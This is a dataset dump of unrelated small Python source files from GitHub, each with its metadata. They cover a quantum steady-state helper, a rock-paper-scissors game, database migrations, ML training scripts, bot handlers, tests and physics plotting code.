np.allclose(steady, steady.conj().T):\n error = \"Steady state is not hermitian.\"\n \n if error is not None and not all(np.real(np.eigvals(steady)) >= 0):\n error = \"Steady state is not positive semi-definite.\"\n\n return steady, error\n\n\n############## Synthesis of coupling operators\n## These are just pauli-X and pauli-Z on each qubit\n\ndef single_qubit_operator(eigv, idx, nqubits, matkey):\n mat = np.array({\n \"X\": [[0,1],[1,0]],\n \"Z\": [[1,0],[0,-1]],\n }[matkey]).astype(complex)\n \n out = np.eye(2**idx).astype(complex)\n out = np.kron(out, mat)\n out = np.kron(out, np.eye(2**(nqubits-idx-1)).astype(complex))\n \n return eigv.conj().T @ out @ eigv\n\ndef make_couplers(eigv):\n nqubits = int(np.log2(eigv.shape[0]))\n norm_factor = (2*nqubits)**(-0.5)\n return [single_qubit_operator(eigv, i,nqubits,key)*norm_factor\n 
for i in range(nqubits)\n for key in [\"X\",\"Z\"]]","repo_name":"qiskit-research/promised-davies-generator","sub_path":"src/lindblad_analysis.py","file_name":"lindblad_analysis.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"12346942413","text":"import random\n\n'''This is a classic game of Rock, Paper, Scissors'''\n\ncomp_wins = 0#..................................................variable for computer's wins\nplayer_wins = 0#................................................variable for player's wins\n\ndef choose_option():#...........................................fcn defined to collect yser option\n user_choice = input(\"Choose Rock, Paper, or Scissors: \")#...user's input\n if user_choice in [\"Rock\", \"rock\", \"R\", \"r\"]:#..............if statement for rock\n user_choice = \"r\"#......................................defines rock as user choice\n elif user_choice in [\"Paper\", \"paper\", \"P\", \"p\"]:#..........else if statement for paper\n user_choice = \"p\"#......................................defines paper as user choice\n elif user_choice in [\"Scissors\", \"scissors\", \"S\", \"s\"]:#....else if statement for scissors\n user_choice = \"s\"#......................................defines scissors as user choice\n else:#......................................................final else statement\n print(\"Wrong choice. (Rock, Paper, or Scissors)\")#......error message\n chose_option()#.........................................embeds choose_option fcn\n return user_choice#.........................................pulls out the user coice input\n\ndef computer_option():#.........................................fcn defined to randomize comp_choice\n comp_choice = random.randint(1,3)#..........................makes comp_choice random between 1-3\n if comp_choice == 1:#.......................................if statement that defines 1\n comp_choice = \"r\"#......................................1 = r payload\n elif comp_choice == 2:#.....................................else if that defines 2\n comp_choice = \"p\"#......................................2 = p payload\n else:#......................................................else that defines 3\n comp_choice = \"s\"#......................................3 = s payload\n return comp_choice\n\n\n\nwhile True:\n print(\"\")\n user_choice = choose_option()\n comp_choice = computer_option()\n print(\"\")\n\n if user_choice == \"r\":\n if comp_choice == \"r\":\n print(\"You choose rock. The computer choose rock. Tie game.\")\n elif comp_choice == \"p\":\n print(\"You chose rock. The computer choose paper. You lost :(\")\n comp_wins += 1\n elif comp_choice == \"s\":\n print(\"You chose rock. The computer choose scissors. You won!\")\n player_wins += 1\n\n elif user_choice == \"p\":\n if comp_choice == \"r\":\n print(\"You choose paper. The computer choose rock. You won!\")\n player_wins += 1\n elif comp_choice == \"p\":\n print(\"You chose paper. The computer choose paper. Tie game.\")\n elif comp_choice == \"s\":\n print(\"You chose paper. The computer choose scissors. You lost :(\")\n comp_wins += 1\n\n elif user_choice == \"s\":\n if comp_choice == \"r\":\n print(\"You choose scissors. The computer choose rock. You lost :(\")\n comp_wins += 1\n elif comp_choice == \"p\":\n print(\"You chose scissors. The computer choose paper. You won!\")\n player_wins += 1\n elif comp_choice == \"s\":\n print(\"You chose scissors. 
The computer choose scissors. Tie game.\")\n\n print(\"\")\n print(\"Player Wins: \" + str(player_wins))\n print(\"Computer Wins: \" + str(comp_wins))\n print(\"\")\n\n user_choice = input(\"Do you want to play again? (y/n)\")\n if user_choice in [\"Y\", \"y\", \"yes\", \"Yes\"]:\n pass\n elif user_choice in [\"N\", \"n\", \"no\", \"No\"]:\n break\n else:\n break\n \n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n","repo_name":"pittspreneur/Python3","sub_path":"02 Rock, Paper, Scissors Game 1.0.py","file_name":"02 Rock, Paper, Scissors Game 1.0.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21464253566","text":"\"\"\"auto\n\nRevision ID: 13fff80e415a\nRevises: 49137a75e3e9\nCreate Date: 2022-12-01 11:52:27.050951\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlmodel\n\n\n# revision identifiers, used by Alembic.\nrevision = '13fff80e415a'\ndown_revision = '49137a75e3e9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('complexes', 'next_complex_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('complexes', sa.Column('next_complex_id', sa.INTEGER(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###","repo_name":"Deskent/ci_api","sub_path":"ci_api/migrations/versions/13fff80e415a_auto.py","file_name":"13fff80e415a_auto.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74636552131","text":"import sys\n# the mock-0.3.1 dir contains testcase.py, testutils.py & mock.py\nsys.path.append('/home/ubuntu/Kaggle_Pytorch_TGS/semantic-segmentation-pytorch')\nfrom models import *\nfrom torchvision.transforms import Normalize\n\ndef build_segmentation_model(in_arch=\"resnet101_dilated8\",out_arch=\"upernet\",droppout=0.1):\n \n '''\n So we allow 3 versions of the model for now: A Resnet 50 101 with Upernet Decoder pre trained on Imagenet \n also a small model \n \n '''\n #First we build two verison of the model for MEan Teacher or not. 
\n builder = ModelBuilder()\n #Define Encoder\n net_encoder = builder.build_encoder(\n arch=in_arch,\n #fc_dim=2048\n )\n\n #Define Decoder\n net_decoder = builder.build_decoder(\n arch=out_arch,\n fc_dim=2048,\n #weights here lets us load our own weights neat\n num_class=2)\n\n net_encoder_ema = builder.build_encoder(\n arch=in_arch,\n #fc_dim=2048\n )\n\n #Define Decoder\n net_decoder_ema = builder.build_decoder(\n arch=out_arch,\n fc_dim=2048,\n #weights here lets us load our own weights neat\n num_class=2)\n \n class SegmentationModule(SegmentationModuleBase):\n def __init__(self, net_enc, net_dec,drop=0,size=101):\n super(SegmentationModule, self).__init__()\n self.encoder = net_enc\n self.decoder = net_dec\n self.drop=drop\n self.size=size\n \n def forward(self, feed_dict, *, segSize=None):\n inpu=feed_dict['img_data']\n \n encode= self.encoder(inpu, return_feature_maps=True)\n\n if self.drop>0:\n encode[0]=nn.Dropout(self.drop)(encode[0])\n encode[1]=nn.Dropout(self.drop)(encode[1])\n encode[2]=nn.Dropout(self.drop)(encode[2])\n encode[3]=nn.Dropout(self.drop)(encode[3])\n\n pred = self.decoder(encode)\n pred = nn.functional.upsample(pred, size=self.size, mode='bilinear', align_corners=True)\n #Lovasz Softmax needs Sonftmax inputs.\n #pred = nn.functional.softmax(pred, dim=1)\n\n return pred\n \n segmentation_ema=SegmentationModule(\n net_encoder_ema, net_decoder_ema,drop=droppout)\n\n\n \n segmentation_ema=segmentation_ema.cuda()\n\n #Set up the complete model\n segmentation_module = SegmentationModule(\n net_encoder, net_decoder,drop=droppout)\n segmentation_module=segmentation_module.cuda()\n \n for param,param2 in zip(segmentation_ema.parameters(),segmentation_module.parameters()):\n param.data=param2.data\n \n for param in segmentation_ema.parameters():\n param.detach_()\n \n return segmentation_module,segmentation_ema\n \n \n ","repo_name":"leanderloew/Semi-Supervised-Segmentation-Pytorch","sub_path":"model_functions.py","file_name":"model_functions.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"44"} +{"seq_id":"41150407939","text":"# VARIOUS SMALL METHODS TO GET A FEEL FOR THE DATA\n# compute how closely two different correlators are correlated\n# compute the fractional error in the correlator\n\nimport gvar as gv\nimport numpy as np\nimport os \nimport sys\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\nbp = '../data/hybrid'\nconf= ''\n#l3296f211b630m0074m037m440-coul-v5\n#l3264f211b600m00507m0507m628a-coul-v5\n#l3248f211b580m002426m06730m8447\n#l4864f211b600m001907m05252m6382\ngpls = ['l3248f211b580m002426m06730m8447/onemp_vc_abij_m863.gpl', ] \n\nfiles = [os.path.join(bp, conf, gpl) for gpl in gpls]\n\ncorrs = [gv.dataset.Dataset(f) for f in files]\n\ncorrs = [gv.dataset.avg_data(c) for c in corrs]\n\ncorr1 = corrs[0]['onemp.ll']\n#corr2 = corrs[1]['onemm.HH']\n#corr3 = corrs[1]['onemm.RR']\n#corr4 = corrs[1]['onemp.gg']\n#corr5 = corrs[4]['onemm.RR']\n\ny1 = [abs(x.sdev/x.mean) for x in corr1]\n#y2 = [abs(x.sdev/x.mean) for x in corr2]\n#y3 = [abs(x.sdev/x.mean) for x in corr3]\n#y4 = [abs(x.sdev/x.mean) for x in corr4]\n#y5 = [abs(x.sdev/x.mean) for x in corr5]\n\nprint(corr1)\nprint(y1)\n\nsys.exit(0)\n\n\n## fit data to this function\ndef f( t, A, B):\n\t\treturn A*np.exp(B*t)\n\nT = 9\t# stop plotting here\nTT = 7 # stop fitting here\n\n## do the fit\n#start = (0.1, 0.5)\t\t# parameter search starts here\n#popt, pcov = curve_fit( f, range(TT), 
y1[:TT], p0=None)\n#print(popt)\n## LEPAGE arg\n#M_ps = gv.gvar('1.366839(72)')\n#M_h = gv.gvar('1.934(80)')\n#M_h = gv.gvar('1.934(80)')\n#print(M_ps.mean - 0.5*M_h.mean)\n#lepage = [ popt[0]*(gv.exp((M_h - M_ps)*t)).mean for t in range(TT) ]\n#fit_exp = [ popt[0]*(np.exp(popt[1]*t)) for t in range(TT) ]\n\nsys.exit(0)\n\nfig, ax = plt.subplots()\n\n#plt.ylim(top=1)\nplt.yscale('log')\nplt.xlabel('t/a')\nplt.ylabel(r'$\\frac{\\sigma_G}{\\overline{G}}', rotation=0, labelpad = 20)\nax.yaxis.set_label_coords(-.1, 0.43)\n#plt.plot([(y1[i]/y3[i]) for i in range(12)], 'ro', label='32 over 10 ape')\nplt.plot(y1[:T], 'ro', label=r'$1^{-+}$ hybrid')\n#plt.plot(lepage, 'r--', label='$1^{-+}$ lepage argument')\n#plt.plot(y2[:T], 'gx', label=r'$1^{--}$ hybrid')\n#plt.plot(y3[:T], 'b+', label=r'$\\bar{\\psi}\\gamma_i\\psi$', markersize=10)\n#plt.plot(fit_exp, 'rx', label='fit to exp')\n#plt.plot(y5[:15], 'bo', label=r'$1^{--} \\bar{\\psi}\\gamma_i\\psi$')\nplt.title('error/mean of correlator', rotation=0)\n#plt.title(conf)\nplt.text(5, 0.0003, 'FINE ENSEMBLE', fontsize=15)\nplt.legend(fontsize=12)\n#plt.savefig('../figures/fractional_error_corr_fineh.png', dpi=500, bbox_inches=\"tight\")\nplt.show()\n","repo_name":"gray95/lattice-analysis","sub_path":"code/diagnostics.py","file_name":"diagnostics.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"18928333899","text":"import sys,os,logging,glob,pickle,torch,csv,datetime,gc,argparse,math,random, time\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd \nfrom tensorflow.keras import layers\nfrom tensorflow.keras.callbacks import *\nimport tensorflow_hub as hub\nimport tensorflow_text as text\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow import keras\nfrom transformers import pipeline\n\nfrom sklearn.metrics import accuracy_score\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--dsn\", default=\"uci\", type=str)\nparser.add_argument(\"--samplecnt\", default=128, type=int)\nparser.add_argument(\"--epoch\", default=12, type=int)\nparser.add_argument(\"--gpu\", default=1, type=int)\nparser.add_argument(\"--reward\", default='hard', type=str) \n\n# ppo \nparser.add_argument(\"--temperature\", default=1.0, type=float) \nparser.add_argument(\"--min_tokens_to_keep\", default=1, type=int) \nparser.add_argument(\"--fbs\", default=16, type=int)\nparser.add_argument(\"--ppo_batchsize\", default=32, type=int)\nparser.add_argument(\"--forward_batch_size\", default=32, type=int)\nparser.add_argument(\"--init_kl_coef\", default=0.2, type=float) \nparser.add_argument(\"--cliprange\", default=0.2, type=float) \nparser.add_argument(\"--cliprange_value\", default=0.2, type=float) \nparser.add_argument(\"--ref_ft\", default=0, type=int)\nparser.add_argument(\"--gpt_ft\", default=0, type=int)\nparser.add_argument(\"--ft_pattern\", default='pp', type=str, choices=['pp', 'tc', 'no'])\nparser.add_argument(\"--ppo_train_epoch\", default=1, type=int)\n\n\nargs = parser.parse_args()\nprint('args==>', args)\n\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n try:\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n # tf.config.experimental.set_virtual_device_configuration(gpu, \\\n # [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1024)])\n except RuntimeError as e:\n print(e)\ndevice = torch.device(\"cuda:{}\".format(args.gpu) if torch.cuda.is_available() else 
\"cpu\")\nassert device.type=='cuda'\nfrom utils.load_data import * \nfrom utils.transblock import * \nfrom utils.gan_config import * \nfrom utils.ppo_config import * \nassert gpus\n\n\n@tf.function\ndef train_step_gan(prompts_tensor, prompts_syn_tensor, labels_tensor, labels_syn_tensor):\n combined_prompts = tf.concat([prompts_tensor, prompts_syn_tensor], axis=0)\n combined_labels = tf.concat([labels_tensor, labels_syn_tensor], axis=0)\n # generator_ral update\n with tf.GradientTape() as tape:\n predictions = model_gan(combined_prompts)\n loss = keras.losses.SparseCategoricalCrossentropy()(combined_labels, predictions)\n grads = tape.gradient(loss, model_gan.trainable_weights)\n gan_optimizer.apply_gradients(zip(grads, model_gan.trainable_weights))\n return loss\n\n\n\n####### prepare data\nds = load_data(dataset=args.dsn, samplecnt=args.samplecnt)\n#ds, max_len = process_ds(ds)\n\nnum_classes = ds.df_test.label.unique().shape[0]\n\ndef get_model_bert_for_gan(num_classes):\n\n text_input = tf.keras.layers.Input(shape=(), dtype=tf.string) # shape=(None,) dtype=string\n\n encoder = hub.KerasLayer(\"./resource/albert_en_base_2\", trainable=True)\n\n encoder_inputs = preprocessor_layer(text_input)\n outputs = encoder(encoder_inputs)\n embed = outputs[\"pooled_output\"] \n\n if num_classes == 2:\n out = layers.Dense(1, activation='sigmoid')(embed)\n model = tf.keras.Model(inputs=text_input, outputs=out)\n #model.compile(Adam(lr=2e-5), \"binary_crossentropy\", metrics=[\"binary_accuracy\"])\n else:\n out = layers.Dense(num_classes, activation=\"softmax\")(embed)\n model = tf.keras.Model(inputs=text_input, outputs=out)\n #model.compile(Adam(lr=2e-5), \"sparse_categorical_crossentropy\", metrics=[\"acc\"])\n return model\n\nmodel_gan = get_model_bert_for_gan(num_classes*2)\nlr = 4e-5\ngan_optimizer = keras.optimizers.Adam(learning_rate=lr)\n\n#val_acc_metric = tf.keras.metrics.SparseCategoricalAccuracy()\nkl = tf.keras.losses.KLDivergence(reduction=tf.keras.losses.Reduction.NONE)\n\n\n# row = df_batch.sample(1)\n# print(row['label_name'])\n# print(row['content'].tolist()[0])\n# print(row['response'].tolist()[0])\n\n# model_gan.predict(row['content'].values, batch_size=32)\nif args.dsn == 'uci':\n maxlen = 32 \nelif args.dsn == 'ag':\n maxlen = 128\n\nfor epoch in range(args.epoch):\n ds.df_train = ds.df_train.sample(frac=1)\n ix = 0\n while ix < ds.df_train.shape[0]:\n\n df_batch = ds.df_train[ix:ix+args.ppo_batchsize].copy()\n\n torch.cuda.empty_cache() \n\n df_batch, query_tensors, response_tensors = reponse_single(df_batch, gpt2_model_trl, maxlen)\n\n prompts = tf.convert_to_tensor(df_batch['content'].values)\n labels = tf.convert_to_tensor(df_batch['label'].values)\n\n prompts_syn = tf.convert_to_tensor(df_batch['response'].values)\n labels_syn = tf.convert_to_tensor(df_batch['label'].values+ num_classes ) \n\n preds_syn = model_gan.predict(prompts_syn, batch_size=32) \n preds_ori = model_gan.predict(prompts, batch_size=32) \n\n preds_ori_labels = preds_ori.argmax(axis=1)\n preds_syn_labels = preds_syn.argmax(axis=1)\n\n acc_all = accuracy_score(np.concatenate((df_batch['label'].values, df_batch['label'].values+num_classes)),\n np.concatenate((preds_ori_labels, preds_syn_labels)) )\n acc_half = accuracy_score(df_batch['label'].values, \\\n (preds_ori[:,:num_classes] + preds_ori[:,num_classes:]).argmax(axis=1)) \n\n rewards = []\n for i in range(args.ppo_batchsize):\n if args.reward == 'hard':\n if preds_ori_labels[i] == preds_syn_labels[i]:\n rewards.append(1)\n else:\n rewards.append(-1)\n 
elif args.reward == 'soft':\n diff = np.abs(preds_ori[i] - preds_syn[i]).sum()\n rewards.append(1-diff)\n\n # train ppo \n if epoch >= args.ppo_train_epoch : \n stats = ppo_trainer.step(query_tensors, response_tensors, torch.tensor(rewards).to(device)) \n\n # loss_gan = train_step_gan(prompts, prompts_syn, \\\n # tf.cast(labels, tf.float32), tf.cast(labels_syn, tf.float32))\n\n loss_gan = train_step_gan(prompts, prompts_syn, labels, labels_syn)\n\n print(ix, 'of', args.samplecnt*num_classes, 'epoch:', epoch, \\\n 'acc_half:', acc_half, 'acc_all:', acc_all, \\\n 'loss:', loss_gan.numpy(), 'rewards:', np.array(rewards).mean() )\n ix += args.ppo_batchsize\n\n\n preds = model_gan.predict(ds.df_test['content'].values, batch_size=32) \n preds_accum = preds[:,:num_classes] + preds[:,num_classes:]\n acc_half = accuracy_score(ds.df_test['label'].values, preds_accum.argmax(axis=1)) \n\n df_test_batch = ds.df_test.sample(256)\n df_test_batch, _, _ = reponse_single(df_test_batch, gpt2_model_trl, maxlen)\n preds = model_gan.predict(df_test_batch['content'].values, batch_size=32)\n preds_syn = model_gan.predict(df_test_batch['response'].values, batch_size=32)\n\n acc_all = accuracy_score(np.concatenate((df_test_batch['label'].values, df_test_batch['label'].values+num_classes)),\n np.concatenate((preds.argmax(axis=1), preds_syn.argmax(axis=1))) )\n\n df_batch['reward'] =rewards\n\n print('summary epoch:',epoch, acc_half, acc_all, 'rewards==>', round(df_batch['reward'].mean(), 4))\n \n\n\n\n\n","repo_name":"yananchen1989/PLMs_text_classification","sub_path":"legacy/aug_ppo_adversarial.py","file_name":"aug_ppo_adversarial.py","file_ext":"py","file_size_in_byte":7448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36523583722","text":"from .models import FriendRequest\nfrom user_profile.models import CofifiUser\n\ndef friends_requests(request):\n\ttry:\n\t\treceiver_id = request.user.id\n\t\treceiver = CofifiUser.objects.get( id = receiver_id )\n\t\tfriends_requests = FriendRequest.objects.filter(receiver = receiver ).exclude( confirmed = True )\n\t\treturn {\"friends_requests\":friends_requests}\n\texcept CofifiUser.DoesNotExist:\n\t\treturn {}\n","repo_name":"RusEu/CofiPy","sub_path":"friends/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25938858742","text":"import json\n\nasync def hello_cb(bot, event, user):\n await bot.send_text(chat_id=event.message_author['userId'], text=f\"1 ответ на {event.text}\")\n response = await user.wait_response()\n await bot.send_text(chat_id=event.message_author['userId'], text=f\"2 ответ на {response.text}\")\n response = await user.wait_response()\n await bot.send_text(chat_id=event.message_author['userId'], text=f\"3 ответ на {response.text}\")\n\n\nasync def buttons_get_cb(bot, event):\n await bot.send_text(\n chat_id=event.message_author['userId'],\n text=\"Hello with buttons.\",\n inline_keyboard_markup=\"[{}]\".format(json.dumps([\n {\"text\": \"Action 1\", \"url\": \"http://mail.ru\"},\n {\"text\": \"Action 2\", \"callbackData\": \"call_back_id_2\"},\n {\"text\": \"Action 3\", \"callbackData\": \"call_back_id_3\"}\n ])))\n\n\nasync def buttons_answer_cb(bot, event):\n if event.data['callbackData'] == \"call_back_id_2\":\n await bot.answer_callback_query(\n query_id=event.data['queryId'],\n text=\"Hey! 
It's a working button 2.\",\n show_alert=True\n )\n\n elif event.data['callbackData'] == \"call_back_id_3\":\n await bot.answer_callback_query(\n query_id=event.data['queryId'],\n text=\"Hey! It's a working button 3.\",\n show_alert=False\n )\n\n","repo_name":"ICQ-BOTS/async_python_bot","sub_path":"example/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"36255643410","text":"# stdlib\nfrom typing import Tuple\n\n# third party\nimport numpy as np\nimport pytest\n\n# autoprognosis absolute\nfrom autoprognosis.plugins import Imputers\nfrom autoprognosis.plugins.utils.simulate import simulate_nan\nfrom autoprognosis.utils.serialization import load_model, save_model\n\n\ndef dataset(mechanism: str, p_miss: float) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n np.random.seed(0)\n\n n = 20\n p = 4\n\n mean = np.repeat(0, p)\n cov = 0.5 * (np.ones((p, p)) + np.eye(p))\n\n x = np.random.multivariate_normal(mean, cov, size=n)\n x_simulated = simulate_nan(x, p_miss, mechanism)\n\n mask = x_simulated[\"mask\"]\n x_miss = x_simulated[\"X_incomp\"]\n\n return x, x_miss, mask\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"plugin\", Imputers().list())\ndef test_serialization(plugin: str) -> None:\n x, x_miss, mask = dataset(\"MAR\", 0.3)\n\n estimator = Imputers().get(plugin)\n\n estimator.fit_transform(x_miss)\n\n buff = estimator.save()\n estimator_new = Imputers().get_type(plugin).load(buff)\n\n estimator_new.transform(x_miss)\n\n\n@pytest.mark.slow\n@pytest.mark.parametrize(\"plugin\", Imputers().list())\ndef test_pickle(plugin: str) -> None:\n x, x_miss, mask = dataset(\"MAR\", 0.3)\n\n estimator = Imputers().get(plugin)\n\n estimator.fit_transform(x_miss)\n\n buff = save_model(estimator)\n estimator_new = load_model(buff)\n\n estimator_new.transform(x_miss)\n","repo_name":"vanderschaarlab/autoprognosis","sub_path":"tests/plugins/imputers/test_imputation_serde.py","file_name":"test_imputation_serde.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"44"} +{"seq_id":"22704760438","text":"from nltk.corpus import words\n\n\nclass WordCollector:\n\n IN_FILE_NAME = \"words.txt\"\n OUT_FILE_NAME = \"words_list.txt\"\n\n def get_all_words_from_file(self) -> list:\n\n try:\n with open(self.IN_FILE_NAME) as word_file:\n valid_words = set(word_file.read().split())\n return valid_words\n except Exception:\n print(\"Some error occured while getting the words from \" + self.IN_FILE_NAME)\n return []\n\n def get_all_words_from_nltk(self) -> list:\n try:\n all_words_list = words.words()\n return all_words_list\n except Exception:\n print(\"Some error occured while downloading the words.\")\n return []\n\n def filter_words_by_length(self, words_list: list, length: int) -> list:\n filtered_words_list = [str(y).lower() for y in filter(lambda x: len(x) == length, words_list)]\n return filtered_words_list\n\n def create_file(self, filename: str):\n try:\n with open(filename, 'w') as f:\n f.write('Hello, world!\\n')\n print(\"File \" + filename + \" created successfully.\")\n except IOError:\n print(\"Error: could not create file \" + filename)\n\n def write_words_to_file(self, file, words_list: list):\n try:\n with open(file, 'w') as f:\n for word in words_list:\n f.write(word+\"\\n\")\n print(\"Word-List is updated to file \" + file + \" successfully with \" + str(len(words_list)) + \" 
words.\")\n except IOError:\n print(\"Error: could not write to file \" + file)\n\n def find_remove_duplicates(self, words_list: list) -> list:\n new_word_list = []\n for word in words_list:\n if word not in new_word_list:\n new_word_list.append(word)\n return new_word_list\n\nif __name__ == \"__main__\":\n word_collector = WordCollector()\n\n word_list = word_collector.get_all_words_from_file()\n word_list = word_collector.filter_words_by_length(word_list, 5)\n print(len(word_list))\n word_list = word_collector.find_remove_duplicates(word_list)\n print(len(word_list))\n word_collector.create_file(word_collector.OUT_FILE_NAME)\n word_collector.write_words_to_file(word_collector.OUT_FILE_NAME, word_list)\n\n\n\n","repo_name":"KoushikMallik-developer/wordle-solver","sub_path":"download_words.py","file_name":"download_words.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"3813681117","text":"from spdc_inv.utils.defaults import COINCIDENCE_RATE, DENSITY_MATRIX, TOMOGRAPHY_MATRIX\nfrom spdc_inv.utils.utils import G1_Normalization\nfrom spdc_inv import RES_DIR\nfrom jax import numpy as np\n\nimport os\nimport shutil\nimport numpy as onp\nimport matplotlib.pyplot as plt\n\n\ndef save_training_statistics(\n logs_dir,\n fit_results,\n interaction,\n model_parameters,\n):\n if fit_results is not None:\n loss_trn, best_loss = fit_results\n\n pump_coeffs_real, \\\n pump_coeffs_imag, \\\n waist_pump, \\\n crystal_coeffs_real, \\\n crystal_coeffs_imag, \\\n r_scale = model_parameters\n\n pump = open(os.path.join(logs_dir, 'pump.txt'), 'w')\n pump.write(\n type_coeffs_to_txt(\n interaction.pump_basis,\n interaction.pump_max_mode1,\n interaction.pump_max_mode2,\n pump_coeffs_real[0] if pump_coeffs_real is not None\n else interaction.initial_pump_coefficients()[0],\n pump_coeffs_imag[0] if pump_coeffs_imag is not None\n else interaction.initial_pump_coefficients()[1],\n waist_pump[0] if waist_pump is not None\n else interaction.initial_pump_waists(),\n )\n )\n\n if interaction.crystal_basis:\n\n crystal = open(os.path.join(logs_dir, 'crystal.txt'), 'w')\n crystal.write(\n type_coeffs_to_txt(\n interaction.crystal_basis,\n interaction.crystal_max_mode1,\n interaction.crystal_max_mode2,\n crystal_coeffs_real[0] if crystal_coeffs_real is not None\n else interaction.initial_crystal_coefficients()[0],\n crystal_coeffs_imag[0] if crystal_coeffs_imag is not None\n else interaction.initial_crystal_coefficients()[1],\n r_scale[0] if r_scale is not None\n else interaction.initial_crystal_waists(),\n )\n )\n\n if fit_results is not None:\n # print loss\n plt.plot(loss_trn, 'r', label='training')\n plt.ylabel('objective loss')\n plt.xlabel('#epoch')\n # plt.ylim(0.2, 1)\n plt.axhline(y=best_loss, color='gray', linestyle='--')\n plt.text(2, best_loss, f'best = {best_loss}', rotation=0, horizontalalignment='left',\n verticalalignment='top', multialignment='center')\n plt.legend()\n plt.savefig(os.path.join(logs_dir, 'loss'))\n plt.close()\n\n np.save(os.path.join(logs_dir, 'parameters_pump_real.npy'),\n pump_coeffs_real[0] if pump_coeffs_real is not None\n else interaction.initial_pump_coefficients()[0])\n np.save(os.path.join(logs_dir, 'parameters_pump_imag.npy'),\n pump_coeffs_imag[0] if pump_coeffs_imag is not None\n else interaction.initial_pump_coefficients()[1])\n np.save(os.path.join(logs_dir, 'parameters_pump_waists.npy'),\n waist_pump[0] if waist_pump is not None\n else interaction.initial_pump_waists())\n 
if interaction.crystal_basis is not None:\n np.save(os.path.join(logs_dir, 'parameters_crystal_real.npy'),\n crystal_coeffs_real[0] if crystal_coeffs_real is not None\n else interaction.initial_crystal_coefficients()[0])\n np.save(os.path.join(logs_dir, 'parameters_crystal_imag.npy'),\n crystal_coeffs_imag[0] if crystal_coeffs_imag is not None\n else interaction.initial_crystal_coefficients()[1])\n np.save(os.path.join(logs_dir, 'parameters_crystal_effective_waists.npy'),\n r_scale[0] if r_scale is not None\n else interaction.initial_crystal_waists()\n )\n\n return\n\n\ndef save_results(\n run_name,\n observable_vec,\n observables,\n projection_coincidence_rate,\n projection_tomography_matrix,\n Signal,\n Idler,\n):\n results_dir = os.path.join(RES_DIR, run_name)\n if os.path.exists(results_dir):\n shutil.rmtree(results_dir)\n os.makedirs(results_dir, exist_ok=True)\n\n (coincidence_rate, density_matrix, tomography_matrix) = observables\n\n if observable_vec[COINCIDENCE_RATE]:\n coincidence_rate = coincidence_rate[0]\n coincidence_rate = coincidence_rate / np.sum(np.abs(coincidence_rate))\n np.save(os.path.join(results_dir, 'coincidence_rate.npy'), coincidence_rate)\n coincidence_rate_plots(\n results_dir,\n coincidence_rate,\n projection_coincidence_rate,\n Signal,\n Idler,\n )\n\n if observable_vec[DENSITY_MATRIX]:\n density_matrix = density_matrix[0]\n density_matrix = density_matrix / np.trace(np.real(density_matrix))\n np.save(os.path.join(results_dir, 'density_matrix_real.npy'), onp.real(density_matrix))\n np.save(os.path.join(results_dir, 'density_matrix_imag.npy'), onp.imag(density_matrix))\n density_matrix_plots(\n results_dir,\n density_matrix,\n )\n\n if observable_vec[TOMOGRAPHY_MATRIX]:\n tomography_matrix = tomography_matrix[0]\n tomography_matrix = tomography_matrix / np.sum(np.abs(tomography_matrix))\n np.save(os.path.join(results_dir, 'tomography_matrix.npy'), tomography_matrix)\n tomography_matrix_plots(\n results_dir,\n tomography_matrix,\n projection_tomography_matrix,\n Signal,\n Idler,\n )\n\n\ndef coincidence_rate_plots(\n results_dir,\n coincidence_rate,\n projection_coincidence_rate,\n Signal,\n Idler,\n):\n # coincidence_rate = unwrap_kron(coincidence_rate,\n # projection_coincidence_rate.projection_n_modes1,\n # projection_coincidence_rate.projection_n_modes2)\n coincidence_rate = coincidence_rate[0, :].\\\n reshape(projection_coincidence_rate.projection_n_modes2, projection_coincidence_rate.projection_n_modes2)\n\n # Compute and plot reduced coincidence_rate\n g1_ss_normalization = G1_Normalization(Signal.w)\n g1_ii_normalization = G1_Normalization(Idler.w)\n coincidence_rate_reduced = coincidence_rate * \\\n projection_coincidence_rate.tau / (g1_ii_normalization * g1_ss_normalization)\n\n # plot coincidence_rate 2d\n plt.imshow(coincidence_rate_reduced)\n plt.xlabel(r'signal mode i')\n plt.ylabel(r'idle mode j')\n plt.colorbar()\n\n plt.savefig(os.path.join(results_dir, 